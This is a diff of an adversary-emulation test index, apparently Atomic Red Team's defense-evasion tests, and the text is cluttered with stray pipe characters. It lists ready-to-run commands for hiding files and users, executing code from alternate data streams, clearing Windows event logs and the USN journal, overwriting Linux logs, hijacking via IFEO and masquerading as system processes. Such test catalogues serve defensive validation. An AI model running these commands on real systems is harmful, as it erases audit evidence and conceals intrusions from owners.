|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -7813,11 +7871,11 @@ defense-evasion:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'chown #{owner} #{file_or_folder}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: chown - Change file or folder ownership recursively
|
|
|
|
|
description: 'Changes a file or folder''s ownership only recursively using chown.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -7834,7 +7892,7 @@ defense-evasion:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'chown #{owner} #{file_or_folder} -R
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: chattr - Remove immutable file attribute
|
|
|
|
|
description: |
|
|
|
|
|
Remove's a file's `immutable` attribute using `chattr`.
|
|
|
|
@@ -7851,7 +7909,7 @@ defense-evasion:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'chattr -i #{file_to_modify}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1144:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -7930,7 +7988,7 @@ defense-evasion:
|
|
|
|
|
- name: Gatekeeper Bypass
|
|
|
|
|
description: 'Gatekeeper Bypass via command line
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -7994,7 +8052,7 @@ defense-evasion:
|
|
|
|
|
- name: Disable history collection
|
|
|
|
|
description: 'Disables history collection in shells
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -8089,7 +8147,7 @@ defense-evasion:
|
|
|
|
|
- name: Create a hidden file in a hidden directory
|
|
|
|
|
description: 'Creates a hidden file inside a hidden directory
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -8101,11 +8159,11 @@ defense-evasion:
|
|
|
|
|
echo "T1158" > /var/tmp/.hidden-directory/.hidden-file
|
|
|
|
|
cleanup_command: 'rm -rf /var/tmp/.hidden-directory/
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Mac Hidden file
|
|
|
|
|
description: 'Hide a file on MacOS
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -8114,42 +8172,61 @@ defense-evasion:
|
|
|
|
|
command: 'xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00
|
|
|
|
|
40 00 FF FF FF FF 00 00"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Create Windows System File with Attrib
|
|
|
|
|
description: 'Creates a file and marks it as a system file using the attrib.exe
|
|
|
|
|
utility.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Creates a file and marks it as a system file using the attrib.exe utility. Upon execution, open the file in file explorer then open Properties > Details
|
|
|
|
|
and observe that the Attributes are "SA" for System and Archive.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
file_to_modify:
|
|
|
|
|
description: File to modify using Attrib command
|
|
|
|
|
type: string
|
|
|
|
|
default: "%temp%\\T1158.txt"
|
|
|
|
|
dependency_executor_name: command_prompt
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: The file must exist on disk at specified location (#{file_to_modify})
|
|
|
|
|
prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )'
|
|
|
|
|
get_prereq_command: 'echo system_Attrib_T1158 >> #{file_to_modify}'
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: |
|
|
|
|
|
echo T1158 > %TEMP%\T1158.txt
|
|
|
|
|
attrib.exe +s %TEMP%\T1158.txt
|
|
|
|
|
cleanup_command: 'del /A:S %TEMP%\T1158.txt >nul 2>&1
|
|
|
|
|
command: 'attrib.exe +s #{file_to_modify}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'del /A:S #{file_to_modify} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Create Windows Hidden File with Attrib
|
|
|
|
|
description: 'Creates a file and marks it as hidden using the attrib.exe utility.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Creates a file and marks it as hidden using the attrib.exe utility.Upon execution, open File Epxplorer and enable View > Hidden Items. Then, open Properties > Details on the file
|
|
|
|
|
and observe that the Attributes are "SH" for System and Hidden.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
file_to_modify:
|
|
|
|
|
description: File to modify using Attrib command
|
|
|
|
|
type: string
|
|
|
|
|
default: "%temp%\\T1158.txt"
|
|
|
|
|
dependency_executor_name: command_prompt
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: The file must exist on disk at specified location (#{file_to_modify})
|
|
|
|
|
prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )'
|
|
|
|
|
get_prereq_command: 'echo system_Attrib_T1158 >> #{file_to_modify}'
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: |
|
|
|
|
|
echo T1158_hidden > %TEMP%\T1158_hidden.txt
|
|
|
|
|
attrib.exe +h %TEMP%\T1158_hidden.txt
|
|
|
|
|
cleanup_command: 'del /A:H %TEMP%\T1158_hidden.txt >nul 2>&1
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'attrib.exe +h #{file_to_modify}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'del /A:H #{file_to_modify} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Hidden files
|
|
|
|
|
description: 'Requires Apple Dev Tools
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -8162,11 +8239,11 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'setfile -a V #{filename}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Hide a Directory
|
|
|
|
|
description: 'Hide a directory on MacOS
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -8177,11 +8254,11 @@ defense-evasion:
|
|
|
|
|
chflags hidden /var/tmp/T1158_mac.txt
|
|
|
|
|
cleanup_command: 'rm /var/tmp/T1158_mac.txt
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Show all hidden files
|
|
|
|
|
description: 'Show all hidden files on MacOS
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -8189,52 +8266,59 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'defaults write com.apple.finder AppleShowAllFiles YES
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'defaults write com.apple.finder AppleShowAllFiles NO
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Create ADS command prompt
|
|
|
|
|
description: 'Create an Alternate Data Stream with the command prompt. Write
|
|
|
|
|
access is required.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Create an Alternate Data Stream with the command prompt. Write access is required. Upon execution, run "dir /a-d /s /r | find ":$DATA"" in the %temp%
|
|
|
|
|
folder to view that the alternate data stream exists. To view the data in the alternate data stream, run "notepad T1158_has_ads.txt:adstest.txt"
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
file_name:
|
|
|
|
|
description: File name of file to create ADS on.
|
|
|
|
|
type: string
|
|
|
|
|
default: test.txt
|
|
|
|
|
default: "%temp%\\T1158_has_ads_cmd.txt"
|
|
|
|
|
ads_filename:
|
|
|
|
|
description: Name of ADS file.
|
|
|
|
|
type: string
|
|
|
|
|
default: adstest.txt
|
|
|
|
|
dependency_executor_name: command_prompt
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: The file must exist on disk at specified location (#{file_name})
|
|
|
|
|
prereq_command: 'IF EXIST #{file_name} ( EXIT 0 ) ELSE ( EXIT 1 )'
|
|
|
|
|
get_prereq_command: 'echo normal_text >> #{file_name} >nul 2>&1'
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: |
|
|
|
|
|
echo "Normal Text." > #{file_name}
|
|
|
|
|
echo cmd /c echo "Shell code execution."> #{file_name}:#{ads_filename}
|
|
|
|
|
for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i
|
|
|
|
|
for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i
|
|
|
|
|
cleanup_command: 'del #{file_name} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Create ADS PowerShell
|
|
|
|
|
description: 'Create an Alternate Data Stream with PowerShell. Write access
|
|
|
|
|
is required.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Create an Alternate Data Stream with PowerShell. Write access is required. To verify execution, the the command "ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname"
|
|
|
|
|
in the %temp% direcotry to view all files with hidden data streams. To view the data in the alternate data stream, run "notepad.exe T1158_has_ads_powershell.txt:adstest.txt" in the %temp% folder.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
file_name:
|
|
|
|
|
description: File name of file to create ADS on.
|
|
|
|
|
type: string
|
|
|
|
|
default: test.txt
|
|
|
|
|
default: "$env:TEMP\\T1158_has_ads_powershell.txt"
|
|
|
|
|
ads_filename:
|
|
|
|
|
description: Name of ADS file.
|
|
|
|
|
type: string
|
|
|
|
|
default: adstest.txt
|
|
|
|
|
dependency_executor_name: powershell
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: The file must exist on disk at specified location (#{file_name})
|
|
|
|
|
prereq_command: 'if (Test-Path #{file_name}) { exit 0 } else { exit 1 }'
|
|
|
|
|
get_prereq_command: 'New-Item -Path #{file_name} | Out-Null'
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
elevation_required: false
|
|
|
|
@@ -8242,10 +8326,9 @@ defense-evasion:
|
|
|
|
|
echo "test" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value "test"
|
|
|
|
|
set-content -path #{file_name} -stream #{ads_filename} -value "test2"
|
|
|
|
|
set-content -path . -stream #{ads_filename} -value "test3"
|
|
|
|
|
ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname
|
|
|
|
|
cleanup_command: 'Remove-Item -Path #{file_name} -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1147:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -8293,7 +8376,7 @@ defense-evasion:
|
|
|
|
|
- name: Hidden Users
|
|
|
|
|
description: 'Add a hidden user on MacOS
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -8305,7 +8388,7 @@ defense-evasion:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'sudo dscl . -create /Users/#{user_name} UniqueID 333
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1143:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -8377,7 +8460,7 @@ defense-evasion:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'Start-Process #{powershell_command}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1183:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -8467,7 +8550,7 @@ defense-evasion:
|
|
|
|
|
- name: IFEO Add Debugger
|
|
|
|
|
description: 'Leverage Global Flags Settings
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -8485,15 +8568,15 @@ defense-evasion:
|
|
|
|
|
command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
|
|
|
|
|
File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
|
|
|
|
|
File Execution Options\#{target_binary}" /v Debugger /f
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: IFEO Global Flags
|
|
|
|
|
description: 'Leverage Global Flags Settings
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -8597,7 +8680,7 @@ defense-evasion:
|
|
|
|
|
- name: Clear Logs
|
|
|
|
|
description: 'Upon execution this test will clear Windows Event Logs
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -8610,12 +8693,12 @@ defense-evasion:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'wevtutil cl #{log_name}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: FSUtil
|
|
|
|
|
description: 'Manages the update sequence number (USN) change journal, which
|
|
|
|
|
provides a persistent log of all changes made to files on the volume.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -8623,11 +8706,11 @@ defense-evasion:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'fsutil usn deletejournal /D C:
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: rm -rf
|
|
|
|
|
description: 'Delete system and audit logs
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -8641,7 +8724,7 @@ defense-evasion:
|
|
|
|
|
This technique was used by threat actor Rocke during the exploitation of Linux
|
|
|
|
|
web servers.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -8653,12 +8736,12 @@ defense-evasion:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'echo 0> /var/spool/mail/#{username}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Overwrite Linux Log
|
|
|
|
|
description: 'This test overwrites the specified log. This technique was used
|
|
|
|
|
by threat actor Rocke during the exploitation of Linux web servers.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -8670,12 +8753,12 @@ defense-evasion:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'echo 0> #{log_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Delete System Logs Using PowerShell
|
|
|
|
|
description: 'Recommended Detection: Monitor for use of the windows event log
|
|
|
|
|
filepath in PowerShell couple with delete arguments
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -8687,11 +8770,11 @@ defense-evasion:
|
|
|
|
|
Remove-Item C:\Windows\System32\winevt\Logs\Security.evtx
|
|
|
|
|
cleanup_command: 'Start-Service -Name EventLog
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Delete System Logs Using Clear-EventLogId
|
|
|
|
|
description: 'Clear event logs using built-in PowerShell commands
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -8699,7 +8782,7 @@ defense-evasion:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'Clear-EventLog -logname Application
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1202:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -8891,7 +8974,7 @@ defense-evasion:
|
|
|
|
|
- name: Install root CA on CentOS/RHEL
|
|
|
|
|
description: 'Creates a root CA with openssl
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -8973,7 +9056,7 @@ defense-evasion:
|
|
|
|
|
description: 'Executes the CheckIfInstallable class constructor runner instead
|
|
|
|
|
of executing InstallUtil.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -9039,7 +9122,7 @@ defense-evasion:
|
|
|
|
|
description: 'Executes the InstallHelper class constructor runner instead of
|
|
|
|
|
executing InstallUtil.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -9106,7 +9189,7 @@ defense-evasion:
|
|
|
|
|
- name: InstallUtil class constructor method call
|
|
|
|
|
description: 'Executes the installer assembly class constructor.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -9173,7 +9256,7 @@ defense-evasion:
|
|
|
|
|
- name: InstallUtil Install method call
|
|
|
|
|
description: 'Executes the Install Method
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -9240,7 +9323,7 @@ defense-evasion:
|
|
|
|
|
- name: InstallUtil Uninstall method call - /U variant
|
|
|
|
|
description: 'Executes the Uninstall Method
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -9308,7 +9391,7 @@ defense-evasion:
|
|
|
|
|
variant
|
|
|
|
|
description: 'Executes the Uninstall Method
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -9375,7 +9458,7 @@ defense-evasion:
|
|
|
|
|
- name: InstallUtil HelpText method call
|
|
|
|
|
description: 'Executes the Uninstall Method
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -9443,7 +9526,7 @@ defense-evasion:
|
|
|
|
|
description: 'Executes an InstallUtil assembly by renaming InstallUtil.exe and
|
|
|
|
|
using a nonstandard extension for the assembly.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -9560,14 +9643,14 @@ defense-evasion:
|
|
|
|
|
- name: Launchctl
|
|
|
|
|
description: 'Utilize launchctl
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1036:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -9693,7 +9776,7 @@ defense-evasion:
|
|
|
|
|
%SystemRoot%\Temp\lsass.exe /B
|
|
|
|
|
cleanup_command: 'del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Masquerading as Linux crond process.
|
|
|
|
|
description: |
|
|
|
|
|
Copies sh process, renames it as crond, and executes it to masquerade as the cron daemon.
|
|
|
|
@@ -9722,7 +9805,7 @@ defense-evasion:
|
|
|
|
|
cmd.exe /c %APPDATA%\notepad.exe /B
|
|
|
|
|
cleanup_command: 'del /Q /F %APPDATA%\notepad.exe >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Masquerading - wscript.exe running as svchost.exe
|
|
|
|
|
description: |
|
|
|
|
|
Copies wscript.exe, renames it, and launches it to masquerade as an instance of svchost.exe.
|
|
|
|
@@ -9738,7 +9821,7 @@ defense-evasion:
|
|
|
|
|
cmd.exe /c %APPDATA%\svchost.exe /B
|
|
|
|
|
cleanup_command: 'del /Q /F %APPDATA%\svchost.exe >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Masquerading - powershell.exe running as taskhostw.exe
|
|
|
|
|
description: |
|
|
|
|
|
Copies powershell.exe, renames it, and launches it to masquerade as an instance of taskhostw.exe.
|
|
|
|
@@ -9754,7 +9837,7 @@ defense-evasion:
|
|
|
|
|
cmd.exe /K %APPDATA%\taskhostw.exe
|
|
|
|
|
cleanup_command: 'del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Masquerading - non-windows exe running as windows exe
|
|
|
|
|
description: |
|
|
|
|
|
Copies an exe, renames it as a windows exe, and launches it to masquerade as a real windows exe
|
|
|
|
@@ -9787,12 +9870,12 @@ defense-evasion:
|
|
|
|
|
Stop-Process -ID $myT1036
|
|
|
|
|
cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Masquerading - windows exe running as different windows exe
|
|
|
|
|
description: 'Copies a windows exe, renames it as another windows exe, and launches
|
|
|
|
|
it to masquerade as second windows exe
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -9813,7 +9896,7 @@ defense-evasion:
|
|
|
|
|
Stop-Process -ID $myT1036
|
|
|
|
|
cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Malicious process Masquerading as LSM.exe
|
|
|
|
|
description: |
|
|
|
|
|
Detect LSM running from an incorrect directory and an incorrect service account
|
|
|
|
@@ -9914,10 +9997,9 @@ defense-evasion:
|
|
|
|
|
identifier: T1112
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Modify Registry of Current User Profile - cmd
|
|
|
|
|
description: 'Modify the registry of the currently logged in user using reg.exe
|
|
|
|
|
cia cmd console
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Modify the registry of the currently logged in user using reg.exe via cmd console. Upon execution, the message "The operation completed successfully."
|
|
|
|
|
will be displayed. Additionally, open Registry Editor to view the new entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -9926,96 +10008,39 @@ defense-evasion:
|
|
|
|
|
command: 'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
|
|
|
|
|
/t REG_DWORD /v HideFileExt /d 1 /f
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
|
|
|
|
|
/v HideFileExt /f
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Modify Registry of Local Machine - cmd
|
|
|
|
|
description: |
|
|
|
|
|
Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when
|
|
|
|
|
CMD is ran as Administrative rights.
|
|
|
|
|
CMD is ran as Administrative rights. Upon execution, the message "The operation completed successfully."
|
|
|
|
|
will be displayed. Additionally, open Registry Editor to view the modified entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
new_executable:
|
|
|
|
|
description: New executable to run on startup instead of Windows Defender
|
|
|
|
|
type: string
|
|
|
|
|
default: calc.exe
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
|
|
|
|
|
/t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f
|
|
|
|
|
/t REG_EXPAND_SZ /v SecurityHealth /d #{new_executable} /f
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
|
|
|
|
|
/v SecurityHealth /f
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Modify Registry of Another User Profile
|
|
|
|
|
description: 'Modify a registry key of each user profile not currently loaded
|
|
|
|
|
on the machine using both powershell and cmd line tools.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: |
|
|
|
|
|
# here is an example of using the same method of reg load, but without the New-PSDrive cmdlet.
|
|
|
|
|
# Here we can load all unloaded user hives and do whatever we want in the location below (comments)
|
|
|
|
|
$PatternSID = 'S-1-5-21-\d+-\d+\-\d+\-\d+$'
|
|
|
|
|
|
|
|
|
|
Write-Verbose -Message 'Gathering Profile List and loading their registry hives'
|
|
|
|
|
# Get Username, SID, and location of ntuser.dat for all users
|
|
|
|
|
|
|
|
|
|
$ProfileList = @()
|
|
|
|
|
$ProfileList = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\*' | Where-Object { $_.PSChildName -match $PatternSID } |
|
|
|
|
|
Select @{ name = "SID"; expression = { $_.PSChildName } },
|
|
|
|
|
@{ name = "UserHive"; expression = { "$($_.ProfileImagePath)\ntuser.dat" } },
|
|
|
|
|
@{ name = "Username"; expression = { $_.ProfileImagePath -replace '^(.*[\\\/])', '' } }
|
|
|
|
|
|
|
|
|
|
# Get all user SIDs found in HKEY_USERS (ntuder.dat files that are loaded)
|
|
|
|
|
$LoadedHives = Get-ChildItem Registry::HKEY_USERS | ? { $_.PSChildname -match $PatternSID } | Select @{ name = "SID"; expression = { $_.PSChildName } }
|
|
|
|
|
|
|
|
|
|
$SIDObject = @()
|
|
|
|
|
|
|
|
|
|
foreach ($item in $LoadedHives)
|
|
|
|
|
{
|
|
|
|
|
$props = @{
|
|
|
|
|
SID = $item.SID
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
$TempSIDObject = New-Object -TypeName PSCustomObject -Property $props
|
|
|
|
|
$SIDObject += $TempSIDObject
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
# We need to use ($ProfileList | Measure-Object).count instead of just ($ProfileList).count because in PS V2
|
|
|
|
|
# if the count is less than 2 it doesn't work. :)
|
|
|
|
|
for ($p = 0; $p -lt ($ProfileList | Measure-Object).count; $p++)
